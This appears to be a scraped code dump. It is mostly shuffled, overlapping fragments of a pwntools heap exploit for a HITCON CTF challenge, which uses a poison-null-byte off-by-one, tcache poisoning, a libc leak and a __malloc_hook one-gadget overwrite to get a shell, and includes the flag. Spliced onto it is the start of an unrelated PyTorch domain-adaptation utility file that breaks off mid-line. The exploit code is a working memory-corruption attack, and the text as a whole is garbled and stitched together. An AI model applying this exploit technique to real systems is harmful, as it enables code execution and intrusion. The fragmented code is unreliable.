0x3ebca0 print 'libc base: {}'.format(hex(libc_base)) # table[2] => chunk_5 (0x71)", "hitcon{l4st_rem41nd3r_1s_v3ry_us3ful} # p = remote('192.168.127.12', 8763) p = process('./program', env = {'LD_PRELOAD': './libc-2.27.so'})", "fake_chunk is at the head of the list, this allocation returns it #", "pointing to the same address delete_heap(0) delete_heap(2) # we can create a fake", "place as chunk_1 new_heap(0x68, 'f' * 0x67) # we used tcache_dup attack here", "writes null byte at the end of buffer. # when i == 0,", "'fake chunk: {}'.format(hex(fake_chunk)) # table[4] => chunk_5 (0x71) # we used tcache_poisoning here", "chunk_2 from # 0x601 t0 0x600. Therefore, we clear PREV_IN_USE bit. new_heap(0x68 -", "overlapping free chunk with chunk_1 # the resulting big chunk will be put", "return p.sendafter('Data:', data) if len(data) < size: p.sendline() def show_heap(index): p.sendlineafter('Your choice: ',", "writes # a libc address into chunk_1 fd/bk fields new_heap(0x508, 'e' * 0x507)", "0x67) ''' 0x4f322 execve(\"/bin/sh\", rsp+0x40, environ) constraints: [rsp+0x40] == NULL ''' # table[6]", "in the unsorted bin delete_heap(2) # table[1] => chunk_4 (0x511) # this will", "malloc_hook - 0x13 print 'fake chunk: {}'.format(hex(fake_chunk)) # table[4] => chunk_5 (0x71) #", "the prev_size field of chunk_2 new_heap(0x68, 'b' * 0x60 + p64(0x580)) # when", "# even though they are pointing to the same address delete_heap(0) delete_heap(2) #", "even though they are pointing to the same address delete_heap(0) delete_heap(2) # we", "be consolidated with chunk_2 later delete_heap(0) # when we free a chunk, programs", "with context.quiet: # hitcon{l4st_rem41nd3r_1s_v3ry_us3ful} # p = remote('192.168.127.12', 8763) p = process('./program', env", "chunk_1 multiple times with different sizes # interestingly, it always have chunk size", "for preventing consolidation of previous # chunks with the top chunk new_heap(0x20, 'd'", "need to free the chunk, so malloc returns it on the next new_heap", "in tcache # even though they are pointing to the same address delete_heap(0)", "off-by-one (poison-null-byte) attack delete_heap(1) # chunk_0 should we freed so it can be", "# chunk_5 will be served from tcache and we will put the address", "= process('./program', env = {'LD_PRELOAD': './libc-2.27.so'}) # table[0] => chunk_0 (0x511) new_heap(0x500, 'a'", "with the top chunk new_heap(0x20, 'd' * 0x20) # we need to delete", "can be consolidated with chunk_2 later delete_heap(0) # when we free a chunk,", "new_heap(0x68, 'b' * 0x60 + p64(0x580)) # when we free chunk_2, it consolidates", "same place as chunk_1 new_heap(0x68, 'f' * 0x67) # we used tcache_dup attack", "(0x511) new_heap(0x500, 'a' * 0x4ff) # table[1] => chunk_1 (0x71) new_heap(0x68, 'b' *", "(0x601) new_heap(0x5f0, 'c' * 0x5ef) # table[3] => chunk_3 (0x31) # this chunk", "of chunk_2 from # 0x601 t0 0x600. Therefore, we clear PREV_IN_USE bit. new_heap(0x68", "# table[6] => fake_chunk (0x7f) # since fake_chunk is at the head of", "from tcache and we will put the address of # our fake chunk", "is due to double free # freeing chunk_1 and chunk_5 put them in", "table[3] => chunk_3 (0x31) # this chunk is for preventing consolidation of previous", "'1') p.sendlineafter('Size:', str(size)) if attack: return p.sendafter('Data:', data) if len(data) < size: p.sendline()", "so malloc returns it on the next new_heap call delete_heap(0) # table[0] =>", "(0x31) # this chunk is for preventing consolidation of previous # chunks with", "# table[2] => chunk_5 (0x71) # this will allocate chunk_5 exactly in the", "with different sizes # interestingly, it always have chunk size of 0x71, but", "free the chunk, so malloc returns it on the next new_heap call delete_heap(0)", "data) if len(data) < size: p.sendline() def show_heap(index): p.sendlineafter('Your choice: ', '2') p.sendlineafter('Index:',", "delete_heap(2) # we can create a fake chunk before __malloc_hook with size of", "the top chunk new_heap(0x20, 'd' * 0x20) # we need to delete chunk_1,", "head of the list, this allocation returns it # then, we overwrite __malloc_hook", "fake_chunk = malloc_hook - 0x13 print 'fake chunk: {}'.format(hex(fake_chunk)) # table[4] => chunk_5", "this allocation returns it # then, we overwrite __malloc_hook with one gadget new_heap(0x68,", "str(size)) if attack: return p.sendafter('Data:', data) if len(data) < size: p.sendline() def show_heap(index):", "'3') p.sendlineafter('Index:', str(index)) with context.quiet: # hitcon{l4st_rem41nd3r_1s_v3ry_us3ful} # p = remote('192.168.127.12', 8763) p", "to the same address delete_heap(0) delete_heap(2) # we can create a fake chunk", "gadget new_heap(0x68, 'i' * 0x13 + p64(libc_base + 0x4f322)) # this allocation triggers", "=> chunk_4 (0x511) # this will use the unsorted bin for allocation, and", "buffer. # when i == 0, off-by-one happens and turn size of chunk_2", "', '1') p.sendlineafter('Size:', str(size)) if attack: return p.sendafter('Data:', data) if len(data) < size:", "it can be consolidated with chunk_2 later delete_heap(0) # when we free a", "delete_heap(index): p.sendlineafter('Your choice: ', '3') p.sendlineafter('Index:', str(index)) with context.quiet: # hitcon{l4st_rem41nd3r_1s_v3ry_us3ful} # p", "of chunk_2 new_heap(0x68, 'b' * 0x60 + p64(0x580)) # when we free chunk_2,", "0x13 + p64(libc_base + 0x4f322)) # this allocation triggers __malloc_hook and we have", "happens and turn size of chunk_2 from # 0x601 t0 0x600. Therefore, we", "exactly in the same place as chunk_1 new_heap(0x68, 'f' * 0x67) # we", "the chunk_1. Therefore, # we are allocating/freeing the chunk_1 multiple times with different", "0x507) # viwing chunk_1 will leak libc address show_heap(0) libc_addr = p.recvuntil('\\n$$')[:-3] libc_base", "of 0x7f malloc_hook = libc_base + 0x3ebc30 fake_chunk = malloc_hook - 0x13 print", "used tcache_dup attack here which is due to double free # freeing chunk_1", "0x67) # table[2] => chunk_2 (0x601) new_heap(0x5f0, 'c' * 0x5ef) # table[3] =>", "context.quiet: # hitcon{l4st_rem41nd3r_1s_v3ry_us3ful} # p = remote('192.168.127.12', 8763) p = process('./program', env =", "=> chunk_5 (0x71) # we used tcache_poisoning here # chunk_5 will be served", "=> fake_chunk (0x7f) # since fake_chunk is at the head of the list,", "preventing consolidation of previous # chunks with the top chunk new_heap(0x20, 'd' *", "top chunk new_heap(0x20, 'd' * 0x20) # we need to delete chunk_1, so", "0x5ef) # table[3] => chunk_3 (0x31) # this chunk is for preventing consolidation", "* 0x20) # we need to delete chunk_1, so we can re-allocate it", "show_heap(0) libc_addr = p.recvuntil('\\n$$')[:-3] libc_base = u64(libc_addr + '\\x00' * (8 - len(libc_addr)))", "0x7f malloc_hook = libc_base + 0x3ebc30 fake_chunk = malloc_hook - 0x13 print 'fake", "* 0x67) ''' 0x4f322 execve(\"/bin/sh\", rsp+0x40, environ) constraints: [rsp+0x40] == NULL ''' #", "p.recvuntil('\\n$$')[:-3] libc_base = u64(libc_addr + '\\x00' * (8 - len(libc_addr))) - 0x3ebca0 print", "a overlapping free chunk with chunk_1 # the resulting big chunk will be", "a libc address into chunk_1 fd/bk fields new_heap(0x508, 'e' * 0x507) # viwing", "# table[1] => chunk_4 (0x511) # this will use the unsorted bin for", "byte at the end of buffer. # when i == 0, off-by-one happens", "(0x71) # this set the prev_size field of chunk_2 new_heap(0x68, 'b' * 0x60", "0x4f322)) # this allocation triggers __malloc_hook and we have shell new_heap(1, '', True)", "{}'.format(hex(libc_base)) # table[2] => chunk_5 (0x71) # this will allocate chunk_5 exactly in", "resulting big chunk will be put in the unsorted bin delete_heap(2) # table[1]", "'libc base: {}'.format(hex(libc_base)) # table[2] => chunk_5 (0x71) # this will allocate chunk_5", "overwrite __malloc_hook with one gadget new_heap(0x68, 'i' * 0x13 + p64(libc_base + 0x4f322))", "(0x71) # this causes strcpy writes null byte at the end of buffer.", "and turn size of chunk_2 from # 0x601 t0 0x600. Therefore, we clear", "delete_heap(0) # table[0] => chunk_1 (0x71) # this set the prev_size field of", "of the list, this allocation returns it # then, we overwrite __malloc_hook with", "i)) # we need to free the chunk, so malloc returns it on", "prev_size field of chunk_2 new_heap(0x68, 'b' * 0x60 + p64(0x580)) # when we", "range(9): # table[0] => chunk_1 (0x71) # this causes strcpy writes null byte", "# table[0] => chunk_1 (0x71) # this causes strcpy writes null byte at", "the end of buffer. # when i == 0, off-by-one happens and turn", "# this will use the unsorted bin for allocation, and writes # a", "size for i in range(9): # table[0] => chunk_1 (0x71) # this causes", "# 0x601 t0 0x600. Therefore, we clear PREV_IN_USE bit. new_heap(0x68 - i, 'b'", "clear PREV_IN_USE bit. new_heap(0x68 - i, 'b' * (0x68 - i)) # we", "i == 0, off-by-one happens and turn size of chunk_2 from # 0x601", "chunk new_heap(0x20, 'd' * 0x20) # we need to delete chunk_1, so we", "new_heap(0x500, 'a' * 0x4ff) # table[1] => chunk_1 (0x71) new_heap(0x68, 'b' * 0x67)", "the chunk, so malloc returns it on the next new_heap call delete_heap(0) #", "'a' * 0x4ff) # table[1] => chunk_1 (0x71) new_heap(0x68, 'b' * 0x67) #", "we need to zero out some parts of the chunk_1. Therefore, # we", "before __malloc_hook with size of 0x7f malloc_hook = libc_base + 0x3ebc30 fake_chunk =", "here which is due to double free # freeing chunk_1 and chunk_5 put", "in the same bin in tcache # even though they are pointing to", "we will put the address of # our fake chunk in the chunk_1's", "chunk_1 new_heap(0x68, 'f' * 0x67) # we used tcache_dup attack here which is", "= remote('192.168.127.12', 8763) p = process('./program', env = {'LD_PRELOAD': './libc-2.27.so'}) # table[0] =>", "to launch off-by-one (poison-null-byte) attack delete_heap(1) # chunk_0 should we freed so it", "it consolidates with chunk_0 # therefore, we have a overlapping free chunk with", "table[1] => chunk_1 (0x71) new_heap(0x68, 'b' * 0x67) # table[2] => chunk_2 (0x601)", "in order to launch off-by-one (poison-null-byte) attack delete_heap(1) # chunk_0 should we freed", "0x60 + p64(0x580)) # when we free chunk_2, it consolidates with chunk_0 #", "will use the unsorted bin for allocation, and writes # a libc address", "len(libc_addr))) - 0x3ebca0 print 'libc base: {}'.format(hex(libc_base)) # table[2] => chunk_5 (0x71) #", "of the chunk_1. Therefore, # we are allocating/freeing the chunk_1 multiple times with", "libc_base = u64(libc_addr + '\\x00' * (8 - len(libc_addr))) - 0x3ebca0 print 'libc", "fake_chunk (0x7f) # since fake_chunk is at the head of the list, this", "free chunk_2, it consolidates with chunk_0 # therefore, we have a overlapping free", "# this allocation triggers __malloc_hook and we have shell new_heap(1, '', True) p.interactive()", "always have chunk size of 0x71, but the program only cares # about", "chunk_5 (0x71) # we used tcache_poisoning here # chunk_5 will be served from", "chunk_1 fd/bk fields new_heap(0x508, 'e' * 0x507) # viwing chunk_1 will leak libc", "''' # table[6] => fake_chunk (0x7f) # since fake_chunk is at the head", "whole chunk # so, we need to zero out some parts of the", "+ 0x4f322)) # this allocation triggers __malloc_hook and we have shell new_heap(1, '',", "* 0x4ff) # table[1] => chunk_1 (0x71) new_heap(0x68, 'b' * 0x67) # table[2]", "will allocate chunk_5 exactly in the same place as chunk_1 new_heap(0x68, 'f' *", "0x4ff) # table[1] => chunk_1 (0x71) new_heap(0x68, 'b' * 0x67) # table[2] =>", "= {'LD_PRELOAD': './libc-2.27.so'}) # table[0] => chunk_0 (0x511) new_heap(0x500, 'a' * 0x4ff) #", "attack delete_heap(1) # chunk_0 should we freed so it can be consolidated with", "chunk_1 (0x71) # this set the prev_size field of chunk_2 new_heap(0x68, 'b' *", "0x20) # we need to delete chunk_1, so we can re-allocate it again", "# chunk_0 should we freed so it can be consolidated with chunk_2 later", "# so, we need to zero out some parts of the chunk_1. Therefore,", "fd. new_heap(0x68, p64(fake_chunk)) # table[5] => chunk_1 (0x71) # this allocation serves chunk_1", "len(data) < size: p.sendline() def show_heap(index): p.sendlineafter('Your choice: ', '2') p.sendlineafter('Index:', str(index)) def", "* (0x68 - i)) # we need to free the chunk, so malloc", "though they are pointing to the same address delete_heap(0) delete_heap(2) # we can", "it again # in order to launch off-by-one (poison-null-byte) attack delete_heap(1) # chunk_0", "base: {}'.format(hex(libc_base)) # table[2] => chunk_5 (0x71) # this will allocate chunk_5 exactly", "returns it # then, we overwrite __malloc_hook with one gadget new_heap(0x68, 'i' *", "serves chunk_1 and put fake chunk address in the tcache new_heap(0x68, 'h' *", "== 0, off-by-one happens and turn size of chunk_2 from # 0x601 t0", "viwing chunk_1 will leak libc address show_heap(0) libc_addr = p.recvuntil('\\n$$')[:-3] libc_base = u64(libc_addr", "malloc returns it on the next new_heap call delete_heap(0) # table[0] => chunk_1", "# table[5] => chunk_1 (0x71) # this allocation serves chunk_1 and put fake", "chunk address in the tcache new_heap(0x68, 'h' * 0x67) ''' 0x4f322 execve(\"/bin/sh\", rsp+0x40,", "and we will put the address of # our fake chunk in the", "table[1] => chunk_4 (0x511) # this will use the unsorted bin for allocation,", "chunk_1 (0x71) # this causes strcpy writes null byte at the end of", "delete_heap(2) # table[1] => chunk_4 (0x511) # this will use the unsorted bin", "this chunk is for preventing consolidation of previous # chunks with the top", "'b' * (0x68 - i)) # we need to free the chunk, so", "table[0] => chunk_0 (0x511) new_heap(0x500, 'a' * 0x4ff) # table[1] => chunk_1 (0x71)", "new_heap(0x20, 'd' * 0x20) # we need to delete chunk_1, so we can", "# we used tcache_dup attack here which is due to double free #", "leak libc address show_heap(0) libc_addr = p.recvuntil('\\n$$')[:-3] libc_base = u64(libc_addr + '\\x00' *", "consolidation of previous # chunks with the top chunk new_heap(0x20, 'd' * 0x20)", "process('./program', env = {'LD_PRELOAD': './libc-2.27.so'}) # table[0] => chunk_0 (0x511) new_heap(0x500, 'a' *", "in the tcache new_heap(0x68, 'h' * 0x67) ''' 0x4f322 execve(\"/bin/sh\", rsp+0x40, environ) constraints:", "pwn import * def new_heap(size, data, attack=False): p.sendlineafter('Your choice: ', '1') p.sendlineafter('Size:', str(size))", "env = {'LD_PRELOAD': './libc-2.27.so'}) # table[0] => chunk_0 (0x511) new_heap(0x500, 'a' * 0x4ff)", "table[6] => fake_chunk (0x7f) # since fake_chunk is at the head of the", "so it can be consolidated with chunk_2 later delete_heap(0) # when we free", "0x13 print 'fake chunk: {}'.format(hex(fake_chunk)) # table[4] => chunk_5 (0x71) # we used", "one gadget new_heap(0x68, 'i' * 0x13 + p64(libc_base + 0x4f322)) # this allocation", "choice: ', '3') p.sendlineafter('Index:', str(index)) with context.quiet: # hitcon{l4st_rem41nd3r_1s_v3ry_us3ful} # p = remote('192.168.127.12',", "of 0x71, but the program only cares # about the input size for", "attack here which is due to double free # freeing chunk_1 and chunk_5", "table[4] => chunk_5 (0x71) # we used tcache_poisoning here # chunk_5 will be", "returns it on the next new_heap call delete_heap(0) # table[0] => chunk_1 (0x71)", "= u64(libc_addr + '\\x00' * (8 - len(libc_addr))) - 0x3ebca0 print 'libc base:", "the input size for i in range(9): # table[0] => chunk_1 (0x71) #", "tcache and we will put the address of # our fake chunk in", "can create a fake chunk before __malloc_hook with size of 0x7f malloc_hook =", "chunk_1 and put fake chunk address in the tcache new_heap(0x68, 'h' * 0x67)", "chunk is for preventing consolidation of previous # chunks with the top chunk", "this will use the unsorted bin for allocation, and writes # a libc", "our fake chunk in the chunk_1's fd. new_heap(0x68, p64(fake_chunk)) # table[5] => chunk_1", "need to delete chunk_1, so we can re-allocate it again # in order", "we have a overlapping free chunk with chunk_1 # the resulting big chunk", "chunk, so malloc returns it on the next new_heap call delete_heap(0) # table[0]", "put them in the same bin in tcache # even though they are", "of # our fake chunk in the chunk_1's fd. new_heap(0x68, p64(fake_chunk)) # table[5]", "0x601 t0 0x600. Therefore, we clear PREV_IN_USE bit. new_heap(0x68 - i, 'b' *", "consolidates with chunk_0 # therefore, we have a overlapping free chunk with chunk_1", "with chunk_0 # therefore, we have a overlapping free chunk with chunk_1 #", "list, this allocation returns it # then, we overwrite __malloc_hook with one gadget", "into chunk_1 fd/bk fields new_heap(0x508, 'e' * 0x507) # viwing chunk_1 will leak", "programs writes 0xDA to the whole chunk # so, we need to zero", "will be served from tcache and we will put the address of #", "use the unsorted bin for allocation, and writes # a libc address into", "p64(libc_base + 0x4f322)) # this allocation triggers __malloc_hook and we have shell new_heap(1,", "- 0x3ebca0 print 'libc base: {}'.format(hex(libc_base)) # table[2] => chunk_5 (0x71) # this", "cares # about the input size for i in range(9): # table[0] =>", "some parts of the chunk_1. Therefore, # we are allocating/freeing the chunk_1 multiple", "delete chunk_1, so we can re-allocate it again # in order to launch", "fake chunk before __malloc_hook with size of 0x7f malloc_hook = libc_base + 0x3ebc30", "# freeing chunk_1 and chunk_5 put them in the same bin in tcache", "have chunk size of 0x71, but the program only cares # about the", "size of 0x71, but the program only cares # about the input size", "def show_heap(index): p.sendlineafter('Your choice: ', '2') p.sendlineafter('Index:', str(index)) def delete_heap(index): p.sendlineafter('Your choice: ',", "the program only cares # about the input size for i in range(9):", "with chunk_2 later delete_heap(0) # when we free a chunk, programs writes 0xDA", "# p = remote('192.168.127.12', 8763) p = process('./program', env = {'LD_PRELOAD': './libc-2.27.so'}) #", "delete_heap(1) # chunk_0 should we freed so it can be consolidated with chunk_2", "strcpy writes null byte at the end of buffer. # when i ==", "= p.recvuntil('\\n$$')[:-3] libc_base = u64(libc_addr + '\\x00' * (8 - len(libc_addr))) - 0x3ebca0", "* (8 - len(libc_addr))) - 0x3ebca0 print 'libc base: {}'.format(hex(libc_base)) # table[2] =>", "the resulting big chunk will be put in the unsorted bin delete_heap(2) #", "chunk_1's fd. new_heap(0x68, p64(fake_chunk)) # table[5] => chunk_1 (0x71) # this allocation serves", "chunk_0 # therefore, we have a overlapping free chunk with chunk_1 # the", "the list, this allocation returns it # then, we overwrite __malloc_hook with one", "__malloc_hook with one gadget new_heap(0x68, 'i' * 0x13 + p64(libc_base + 0x4f322)) #", "about the input size for i in range(9): # table[0] => chunk_1 (0x71)", "have a overlapping free chunk with chunk_1 # the resulting big chunk will", "def delete_heap(index): p.sendlineafter('Your choice: ', '3') p.sendlineafter('Index:', str(index)) with context.quiet: # hitcon{l4st_rem41nd3r_1s_v3ry_us3ful} #", "are pointing to the same address delete_heap(0) delete_heap(2) # we can create a", "turn size of chunk_2 from # 0x601 t0 0x600. Therefore, we clear PREV_IN_USE", "put in the unsorted bin delete_heap(2) # table[1] => chunk_4 (0x511) # this", "it # then, we overwrite __malloc_hook with one gadget new_heap(0x68, 'i' * 0x13", "new_heap(0x68, 'i' * 0x13 + p64(libc_base + 0x4f322)) # this allocation triggers __malloc_hook", "previous # chunks with the top chunk new_heap(0x20, 'd' * 0x20) # we", "NULL ''' # table[6] => fake_chunk (0x7f) # since fake_chunk is at the", "python from pwn import * def new_heap(size, data, attack=False): p.sendlineafter('Your choice: ', '1')", "multiple times with different sizes # interestingly, it always have chunk size of", "off-by-one happens and turn size of chunk_2 from # 0x601 t0 0x600. Therefore,", "the address of # our fake chunk in the chunk_1's fd. new_heap(0x68, p64(fake_chunk))", "# interestingly, it always have chunk size of 0x71, but the program only", "will put the address of # our fake chunk in the chunk_1's fd.", "allocation serves chunk_1 and put fake chunk address in the tcache new_heap(0x68, 'h'", "0, off-by-one happens and turn size of chunk_2 from # 0x601 t0 0x600.", "bin delete_heap(2) # table[1] => chunk_4 (0x511) # this will use the unsorted", "delete_heap(0) # when we free a chunk, programs writes 0xDA to the whole", "to zero out some parts of the chunk_1. Therefore, # we are allocating/freeing", "# chunks with the top chunk new_heap(0x20, 'd' * 0x20) # we need", "fake chunk in the chunk_1's fd. new_heap(0x68, p64(fake_chunk)) # table[5] => chunk_1 (0x71)", "=> chunk_5 (0x71) # this will allocate chunk_5 exactly in the same place", "on the next new_heap call delete_heap(0) # table[0] => chunk_1 (0x71) # this", "allocation, and writes # a libc address into chunk_1 fd/bk fields new_heap(0x508, 'e'", "0xDA to the whole chunk # so, we need to zero out some", "'\\x00' * (8 - len(libc_addr))) - 0x3ebca0 print 'libc base: {}'.format(hex(libc_base)) # table[2]", "# this will allocate chunk_5 exactly in the same place as chunk_1 new_heap(0x68,", "served from tcache and we will put the address of # our fake", "so we can re-allocate it again # in order to launch off-by-one (poison-null-byte)", "p.sendlineafter('Your choice: ', '2') p.sendlineafter('Index:', str(index)) def delete_heap(index): p.sendlineafter('Your choice: ', '3') p.sendlineafter('Index:',", "for allocation, and writes # a libc address into chunk_1 fd/bk fields new_heap(0x508,", "chunk_5 will be served from tcache and we will put the address of", "chunk_1. Therefore, # we are allocating/freeing the chunk_1 multiple times with different sizes", "# this set the prev_size field of chunk_2 new_heap(0x68, 'b' * 0x60 +", "for i in range(9): # table[0] => chunk_1 (0x71) # this causes strcpy", "- i, 'b' * (0x68 - i)) # we need to free the", "* def new_heap(size, data, attack=False): p.sendlineafter('Your choice: ', '1') p.sendlineafter('Size:', str(size)) if attack:", "address of # our fake chunk in the chunk_1's fd. new_heap(0x68, p64(fake_chunk)) #", "p.sendlineafter('Size:', str(size)) if attack: return p.sendafter('Data:', data) if len(data) < size: p.sendline() def", "program only cares # about the input size for i in range(9): #", "as chunk_1 new_heap(0x68, 'f' * 0x67) # we used tcache_dup attack here which", "address in the tcache new_heap(0x68, 'h' * 0x67) ''' 0x4f322 execve(\"/bin/sh\", rsp+0x40, environ)", "bit. new_heap(0x68 - i, 'b' * (0x68 - i)) # we need to", "sizes # interestingly, it always have chunk size of 0x71, but the program", "show_heap(index): p.sendlineafter('Your choice: ', '2') p.sendlineafter('Index:', str(index)) def delete_heap(index): p.sendlineafter('Your choice: ', '3')", "input size for i in range(9): # table[0] => chunk_1 (0x71) # this", "chunk, programs writes 0xDA to the whole chunk # so, we need to", "', '3') p.sendlineafter('Index:', str(index)) with context.quiet: # hitcon{l4st_rem41nd3r_1s_v3ry_us3ful} # p = remote('192.168.127.12', 8763)", "0x71, but the program only cares # about the input size for i", "fake chunk address in the tcache new_heap(0x68, 'h' * 0x67) ''' 0x4f322 execve(\"/bin/sh\",", "# table[3] => chunk_3 (0x31) # this chunk is for preventing consolidation of", "launch off-by-one (poison-null-byte) attack delete_heap(1) # chunk_0 should we freed so it can", "should we freed so it can be consolidated with chunk_2 later delete_heap(0) #", "== NULL ''' # table[6] => fake_chunk (0x7f) # since fake_chunk is at", "will leak libc address show_heap(0) libc_addr = p.recvuntil('\\n$$')[:-3] libc_base = u64(libc_addr + '\\x00'", "attack=False): p.sendlineafter('Your choice: ', '1') p.sendlineafter('Size:', str(size)) if attack: return p.sendafter('Data:', data) if", "=> chunk_2 (0x601) new_heap(0x5f0, 'c' * 0x5ef) # table[3] => chunk_3 (0x31) #", "chunk_3 (0x31) # this chunk is for preventing consolidation of previous # chunks", "be served from tcache and we will put the address of # our", "again # in order to launch off-by-one (poison-null-byte) attack delete_heap(1) # chunk_0 should", "'e' * 0x507) # viwing chunk_1 will leak libc address show_heap(0) libc_addr =", "null byte at the end of buffer. # when i == 0, off-by-one", "in the chunk_1's fd. new_heap(0x68, p64(fake_chunk)) # table[5] => chunk_1 (0x71) # this", "same address delete_heap(0) delete_heap(2) # we can create a fake chunk before __malloc_hook", "this set the prev_size field of chunk_2 new_heap(0x68, 'b' * 0x60 + p64(0x580))", "import * def new_heap(size, data, attack=False): p.sendlineafter('Your choice: ', '1') p.sendlineafter('Size:', str(size)) if", "new_heap(0x68, 'h' * 0x67) ''' 0x4f322 execve(\"/bin/sh\", rsp+0x40, environ) constraints: [rsp+0x40] == NULL", "0x4f322 execve(\"/bin/sh\", rsp+0x40, environ) constraints: [rsp+0x40] == NULL ''' # table[6] => fake_chunk", "new_heap(0x5f0, 'c' * 0x5ef) # table[3] => chunk_3 (0x31) # this chunk is", "and writes # a libc address into chunk_1 fd/bk fields new_heap(0x508, 'e' *", "libc_base + 0x3ebc30 fake_chunk = malloc_hook - 0x13 print 'fake chunk: {}'.format(hex(fake_chunk)) #", "# we need to free the chunk, so malloc returns it on the", "# table[4] => chunk_5 (0x71) # we used tcache_poisoning here # chunk_5 will", "# since fake_chunk is at the head of the list, this allocation returns", "libc address into chunk_1 fd/bk fields new_heap(0x508, 'e' * 0x507) # viwing chunk_1", "=> chunk_1 (0x71) # this allocation serves chunk_1 and put fake chunk address", "i, 'b' * (0x68 - i)) # we need to free the chunk,", "chunk_1 and chunk_5 put them in the same bin in tcache # even", "chunk_4 (0x511) # this will use the unsorted bin for allocation, and writes", "a chunk, programs writes 0xDA to the whole chunk # so, we need", "can re-allocate it again # in order to launch off-by-one (poison-null-byte) attack delete_heap(1)", "chunk: {}'.format(hex(fake_chunk)) # table[4] => chunk_5 (0x71) # we used tcache_poisoning here #", "used tcache_poisoning here # chunk_5 will be served from tcache and we will", "'f' * 0x67) # we used tcache_dup attack here which is due to", "remote('192.168.127.12', 8763) p = process('./program', env = {'LD_PRELOAD': './libc-2.27.so'}) # table[0] => chunk_0", "be put in the unsorted bin delete_heap(2) # table[1] => chunk_4 (0x511) #", "* 0x60 + p64(0x580)) # when we free chunk_2, it consolidates with chunk_0", "unsorted bin for allocation, and writes # a libc address into chunk_1 fd/bk", "if attack: return p.sendafter('Data:', data) if len(data) < size: p.sendline() def show_heap(index): p.sendlineafter('Your", "chunk_2 later delete_heap(0) # when we free a chunk, programs writes 0xDA to" ]
[ "weight_decay * 2 i += 1 return optimizer schedule_dict = {\"inv\":inv_lr_scheduler} ################################## #", "classname = m.__class__.__name__ if classname.find('Conv2d') != -1 or classname.find('ConvTranspose2d') != -1: torch.nn.init.kaiming_uniform_(m.weight) torch.nn.init.zeros_(m.bias)", "torch.nn.init.zeros_(m.bias) elif classname.find('Linear') != -1: torch.nn.init.xavier_normal_(m.weight) torch.nn.init.zeros_(m.bias) def to_var(x): \"\"\"Convert numpy to variable.\"\"\"", "CKB_dist = R_s.trace() + R_t.trace() - 2*S_n[:-1].sum()/((num_sam_s*num_sam_t)**0.5) return CKB_dist # MMD loss def", "= lr * param_lr[i] param_group['weight_decay'] = weight_decay * 2 i += 1 return", "m.__class__.__name__ if classname.find('Conv2d') != -1 or classname.find('ConvTranspose2d') != -1: torch.nn.init.kaiming_uniform_(m.weight) torch.nn.init.zeros_(m.bias) elif classname.find('BatchNorm')", "U_s = B_s.symeig(eigenvectors=True) S_t, U_t = B_t.symeig(eigenvectors=True) HC_s = H_s.mm( U_s.mm((S_s+1e-4).pow(0.5).diag()) ) HC_t", "R_s = epsilon*G_Zs.mm(Inv_s) R_t = epsilon*G_Zt.mm(Inv_t) #====== R_{st} ======= # B_s = I_s", "<filename>CKButils.py # -*- coding: utf-8 -*- import torch from torch.autograd import Variable import", "0.1 every lr_decay_epoch epochs.\"\"\" lr = init_lr * (1 + gamma * iter_num)", "correct = 0 for batch_idx, (X, lab) in enumerate(data_loader): X, lab = to_var(X),", "U_n, S_n, V_n = torch.svd(Nuclear) #====== Conditional KB Distance CKB_dist = R_s.trace() +", "accuracy = correct.item() / len(data_loader.dataset) return accuracy def inv_lr_scheduler(param_lr, optimizer, iter_num, gamma, power,", "R_t.trace() - 2*S_n[:-1].sum()/((num_sam_s*num_sam_t)**0.5) return CKB_dist # MMD loss def MMD_Metric(prob_s, prob_t): num_sam_s =", "m.bias.data.fill_(0) def weights_init_kaiming(m): classname = m.__class__.__name__ if classname.find('Conv2d') != -1 or classname.find('ConvTranspose2d') !=", "import sys ################################## # Network & Variable ################################## def weights_init(m): \"\"\"Initialize network parameters.\"\"\"", "= torch.zeros(num_sam_t,num_cls).cuda().scatter(1,plab_t.unsqueeze(1),1).detach() elif CKB_type == 'soft': prob_t = prob_t.detach() else: sys.exit('Error: invalid CKB_type')", "(B_s + B_s.t())/2 # numerical symmetrize B_t = (B_t + B_t.t())/2 # numerical", "# CKB loss def CKB_Metric(fea_s, fea_t, lab_s, plab_t, prob_t, num_cls, epsilon=1e-2, CKB_type='soft'): #", "0.05) m.bias.data.fill_(0) def weights_init_kaiming(m): classname = m.__class__.__name__ if classname.find('Conv2d') != -1 or classname.find('ConvTranspose2d')", "U_t = B_t.symeig(eigenvectors=True) HC_s = H_s.mm( U_s.mm((S_s+1e-4).pow(0.5).diag()) ) HC_t = H_t.mm( U_t.mm((S_t+1e-4).pow(0.5).diag()) )", "+= plab.eq(lab.data).cpu().sum() accuracy = correct.item() / len(data_loader.dataset) return accuracy def inv_lr_scheduler(param_lr, optimizer, iter_num,", "x.data.numpy() def classification_accuracy(data_loader,DNN,FC): with torch.no_grad(): correct = 0 for batch_idx, (X, lab) in", "to_var(X), to_var(lab).long().squeeze() _, prob = FC(DNN(X)) plab = prob.data.max(1)[1] correct += plab.eq(lab.data).cpu().sum() accuracy", "x.cpu() return x.data.numpy() def classification_accuracy(data_loader,DNN,FC): with torch.no_grad(): correct = 0 for batch_idx, (X,", "#====== Conditional KB Distance CKB_dist = R_s.trace() + R_t.trace() - 2*S_n[:-1].sum()/((num_sam_s*num_sam_t)**0.5) return CKB_dist", "torch.nn.init.normal_(m.weight, 1.0, 0.02) torch.nn.init.zeros_(m.bias) elif classname.find('Linear') != -1: torch.nn.init.xavier_normal_(m.weight) torch.nn.init.zeros_(m.bias) def to_var(x): \"\"\"Convert", "U_t.mm((S_t+1e-4).pow(0.5).diag()) ) Nuclear = (HC_t.t().mm(K_ZtZs)).mm(HC_s) U_n, S_n, V_n = torch.svd(Nuclear) #====== Conditional KB", "!= -1: m.weight.data.normal_(0.0, 0.05) elif classname.find('BatchNorm') != -1: m.weight.data.normal_(1.0, 0.02) m.bias.data.fill_(0) elif classname.find('Linear')", "def weights_init(m): \"\"\"Initialize network parameters.\"\"\" classname = m.__class__.__name__ if classname.find('Conv') != -1: m.weight.data.normal_(0.0,", "Cross_Entropy(prob,lab): CE_loss = NLL_loss(torch.log(prob+1e-4), lab) return CE_loss # Entropy Loss def Entropy(prob): num_sam", "Entropy Loss def Entropy(prob): num_sam = prob.shape[0] Entropy = -(prob.mul(prob.log()+1e-4)).sum() return Entropy/num_sam #", "i = 0 for param_group in optimizer.param_groups: param_group['lr'] = lr * param_lr[i] param_group['weight_decay']", "B_t = (B_t + B_t.t())/2 # numerical symmetrize S_s, U_s = B_s.symeig(eigenvectors=True) S_t,", "fea_s.shape[0] num_sam_t = fea_t.shape[0] OneHot_s = 